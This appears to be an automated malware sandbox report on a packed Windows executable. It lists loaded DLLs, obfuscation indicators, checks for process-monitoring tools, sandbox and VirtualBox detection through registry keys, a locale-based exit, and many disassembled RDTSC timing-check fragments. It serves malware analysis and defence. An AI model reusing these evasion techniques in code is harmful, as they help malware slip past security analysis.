              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeVirustotal: Detection: 52%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1801728 > 1048576
              Source: file.exeStatic PE information: Raw size of dnuvwdxn is bigger than: 0x100000 < 0x19da00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.8c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E63C0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c274a should be: 0x1b8d69
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: dnuvwdxn
              Source: file.exeStatic PE information: section name: nviifddd
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE809C push 0FD42B28h; mov dword ptr [esp], ebx0_2_00BE80E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE809C push ecx; mov dword ptr [esp], eax0_2_00BE80FC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBA8ED push eax; mov dword ptr [esp], ecx0_2_00CBA97A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push eax; mov dword ptr [esp], edi0_2_00C3F1B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push eax; mov dword ptr [esp], esp0_2_00C3F1BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push ebp; mov dword ptr [esp], 5D4B62D7h0_2_00C3F1CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push 3050A62Bh; mov dword ptr [esp], eax0_2_00C3F1DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push edx; mov dword ptr [esp], ebx0_2_00C3F281
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push 1184A004h; mov dword ptr [esp], esi0_2_00C3F296
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA push esi; mov dword ptr [esp], ebp0_2_00C3F2DB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF40FE push 0DB67665h; mov dword ptr [esp], edi0_2_00CF4144
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 52BA2576h; mov dword ptr [esp], esi0_2_00C77908
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push edx; mov dword ptr [esp], ebp0_2_00C7790F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 55F59D78h; mov dword ptr [esp], esp0_2_00C77999
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push esi; mov dword ptr [esp], 6B6A8962h0_2_00C779A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 45B86A00h; mov dword ptr [esp], edi0_2_00C77A6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push edi; mov dword ptr [esp], ebx0_2_00C77A71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ecx; mov dword ptr [esp], edi0_2_00C77AA1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 0C36A646h; mov dword ptr [esp], ebp0_2_00C77B18
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ebp; mov dword ptr [esp], ecx0_2_00C77B90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push edx; mov dword ptr [esp], eax0_2_00C77BB3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ebp; mov dword ptr [esp], edx0_2_00C77C0E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ebx; mov dword ptr [esp], eax0_2_00C77C52
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ebx; mov dword ptr [esp], ebp0_2_00C77C8A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push eax; mov dword ptr [esp], 003DFF74h0_2_00C77CA3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push eax; mov dword ptr [esp], ebx0_2_00C77CAE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 28C93C5Eh; mov dword ptr [esp], ebp0_2_00C77D42
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 1525B940h; mov dword ptr [esp], ebp0_2_00C77E03
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push 3E131802h; mov dword ptr [esp], esi0_2_00C77E23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ebp; mov dword ptr [esp], ecx0_2_00C77EB3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F0 push ecx; mov dword ptr [esp], esp0_2_00C77EC9
              Source: file.exeStatic PE information: section name: dnuvwdxn entropy: 7.953787328423517

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E63C0

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-28720
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B100D3 second address: B0F97F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F055D0637C8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 jmp 00007F055D0637C7h 0x0000001d push dword ptr [ebp+122D008Dh] 0x00000023 jc 00007F055D0637B7h 0x00000029 call dword ptr [ebp+122D1C62h] 0x0000002f pushad 0x00000030 jmp 00007F055D0637C1h 0x00000035 xor eax, eax 0x00000037 pushad 0x00000038 mov eax, ecx 0x0000003a mov dword ptr [ebp+122D1A5Bh], eax 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 stc 0x00000046 mov dword ptr [ebp+122D2C59h], eax 0x0000004c mov dword ptr [ebp+122D1A5Bh], eax 0x00000052 mov esi, 0000003Ch 0x00000057 jbe 00007F055D0637C3h 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D2EEFh], eax 0x00000067 lodsw 0x00000069 jmp 00007F055D0637BBh 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 sub dword ptr [ebp+122D2EEFh], esi 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jo 00007F055D0637BCh 0x00000082 mov dword ptr [ebp+122D1C80h], ecx 0x00000088 nop 0x00000089 jno 00007F055D0637C9h 0x0000008f push eax 0x00000090 push ecx 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0F97F second address: B0F983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A1A9 second address: C8A1CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F055D0637CAh 0x00000012 jmp 00007F055D0637C4h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3A0 second address: C7D3D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F055C7C833Fh 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3D1 second address: C7D3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D3D5 second address: C7D3EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F055C7C8326h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895C1 second address: C895D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F055D0637BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895D1 second address: C895D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C895D6 second address: C895DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C896F8 second address: C896FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C896FD second address: C8971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BEh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F055D0637B6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C89856 second address: C8986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F055C7C832Dh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8986A second address: C8987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637BEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8987C second address: C89890 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F055C7C8326h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C73E second address: C8C753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C753 second address: C8C78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C832Fh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1B86h], eax 0x00000012 push 00000000h 0x00000014 push 11381D08h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F055C7C8334h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C78C second address: C8C796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F055D0637B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C796 second address: C8C7F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 11381D88h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F055C7C8328h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dx, si 0x00000030 mov ecx, dword ptr [ebp+122D2BF9h] 0x00000036 push 00000003h 0x00000038 add esi, 0B001B93h 0x0000003e push 00000000h 0x00000040 movzx ecx, si 0x00000043 push 00000003h 0x00000045 js 00007F055C7C832Ch 0x0000004b or ecx, 63F820AEh 0x00000051 push 8DF28B64h 0x00000056 push edx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C7F9 second address: C8C817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 4DF28B64h 0x0000000d lea ebx, dword ptr [ebp+124505C4h] 0x00000013 sub cx, 0FFCh 0x00000018 push eax 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C849 second address: C8C84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C84F second address: C8C854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C854 second address: C8C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C867 second address: C8C86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8C98A second address: C8C994 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CA07 second address: C8CAA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F055D0637C9h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F055D0637B8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007F055D0637C5h 0x0000002f call 00007F055D0637B9h 0x00000034 jmp 00007F055D0637C7h 0x00000039 push eax 0x0000003a je 00007F055D0637CCh 0x00000040 push ecx 0x00000041 jmp 00007F055D0637C4h 0x00000046 pop ecx 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAA8 second address: C8CAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAAC second address: C8CAB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB0 second address: C8CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CAB6 second address: C8CB2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F055D0637BBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jp 00007F055D0637CDh 0x00000013 push eax 0x00000014 jmp 00007F055D0637C5h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jmp 00007F055D0637BEh 0x00000023 pop eax 0x00000024 mov ecx, 64DB2201h 0x00000029 push 00000003h 0x0000002b jng 00007F055D0637B6h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 pop edi 0x00000035 sub cl, 00000077h 0x00000038 push 00000003h 0x0000003a call 00007F055D0637B9h 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 jmp 00007F055D0637C0h 0x00000047 pop edi 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB2C second address: C8CB42 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F055C7C832Ch 0x00000008 ja 00007F055C7C8326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB42 second address: C8CB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F055D0637B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB4D second address: C8CB5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB5F second address: C8CB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CB68 second address: C8CBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007F055C7C832Ch 0x00000010 jg 00007F055C7C8326h 0x00000016 jmp 00007F055C7C832Dh 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push edi 0x00000021 pushad 0x00000022 jmp 00007F055C7C8331h 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a pop edi 0x0000002b pop eax 0x0000002c lea ebx, dword ptr [ebp+124505D8h] 0x00000032 jnl 00007F055C7C8328h 0x00000038 mov edi, ecx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8CBBD second address: C8CBC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DBA0 second address: C9DBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DBB7 second address: C9DBBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD029 second address: CAD040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F055C7C832Ah 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD040 second address: CAD044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE07 second address: C7EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F055C7C8326h 0x0000000a pop eax 0x0000000b jg 00007F055C7C8332h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE24 second address: C7EE42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C3h 0x00000007 push eax 0x00000008 jns 00007F055D0637B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB22C second address: CAB25B instructions: 0x00000000 rdtsc 0x00000002 js 00007F055C7C8326h 0x00000008 jmp 00007F055C7C832Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F055C7C8331h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F055C7C8326h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB3A1 second address: CAB3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB3A5 second address: CAB3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F055C7C832Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE20 second address: C7EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB534 second address: CAB53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB53A second address: CAB542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB67C second address: CAB694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F055C7C8326h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7D1 second address: CAB7E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F055D0637B8h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7E7 second address: CAB7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB7F1 second address: CAB80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F055D0637C4h 0x0000000d popad 0x0000000e rdtsc
